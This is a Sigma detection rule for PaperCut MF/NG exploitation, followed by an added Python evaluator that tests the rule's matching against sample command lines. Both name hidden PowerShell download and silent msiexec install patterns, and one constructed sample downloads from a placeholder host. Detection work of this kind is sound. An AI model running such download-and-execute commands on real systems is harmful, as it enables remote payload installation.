PaperCut MF/NG Exploitation Related Indicators

Detects indicators related to the exploitation of PaperCut MF/NG.

Sigma rule

title: PaperCut MF/NG Exploitation Related Indicators
id: de1bd0b6-6d59-417c-86d9-a44114aede3b
status: test
description: Detects exploitation indicators related to PaperCut MF/NG Exploitation
references:
    - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software
    - https://www.papercut.com/kb/Main/PO-1216-and-PO-1219
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-04-25
tags:
    - attack.execution
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_1:
        CommandLine|contains|all:
            - ' /c '
            - 'powershell'
            - '-nop -w hidden'
            - 'Invoke-WebRequest'
            - 'setup.msi'
            - '-OutFile'
    selection_2:
        CommandLine|contains|all:
            - 'msiexec '
            - '/i '
            - 'setup.msi '
            - '/qn '
            - 'IntegratorLogin=fimaribahundq'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: high
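
The rule's matching logic, as an added example that is not part of the original rule or its project: a small Python evaluator that applies both contains|all selections and the "1 of selection_*" condition to process-creation command lines, useful for checking which events would alert before deploying the rule. The sample command lines, the host.invalid placeholder and the function names are constructed for illustration.

```python
# Added example: evaluate the rule's detection block against command lines.
# Substrings are copied from the rule; everything else is constructed.
SELECTIONS = {
    "selection_1": [" /c ", "powershell", "-nop -w hidden",
                    "Invoke-WebRequest", "setup.msi", "-OutFile"],
    "selection_2": ["msiexec ", "/i ", "setup.msi ", "/qn ",
                    "IntegratorLogin=fimaribahundq"],
}


def matched_selections(command_line):
    """Return the names of selections whose substrings are ALL present.

    Sigma string matching is case-insensitive by default, and
    'contains|all' does not care about the order of the substrings.
    """
    haystack = command_line.lower()
    return [name for name, needles in SELECTIONS.items()
            if all(needle.lower() in haystack for needle in needles)]


def rule_fires(command_line):
    # condition: 1 of selection_*
    return bool(matched_selections(command_line))


# Constructed CommandLine values; host.invalid is a placeholder host.
SAMPLES = {
    "download": 'cmd /c "powershell.exe -nop -w hidden Invoke-WebRequest '
                'http://host.invalid/setup.msi -OutFile setup.msi"',
    "install": "msiexec /i setup.msi /qn IntegratorLogin=fimaribahundq",
    "install_upper": "MSIEXEC /I SETUP.MSI /QN INTEGRATORLOGIN=FIMARIBAHUNDQ",
    # Routine silent installs and downloads that must not alert.
    "benign_install": "msiexec /i setup.msi /qn /norestart",
    "benign_download": 'powershell -Command "Invoke-WebRequest '
                       'https://host.invalid/agent.msi -OutFile agent.msi"',
}


def triage(samples=SAMPLES):
    """Map each sample label to the list of selections it matched."""
    return {label: matched_selections(cmd) for label, cmd in samples.items()}


if __name__ == "__main__":
    for label, hits in triage().items():
        print(f"{label:16} {'ALERT ' + ','.join(hits) if hits else 'no match'}")
```

The two benign samples show why the rule lists false positives as unlikely: a silent install of a file named setup.msi only alerts when the specific IntegratorLogin value is also present.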
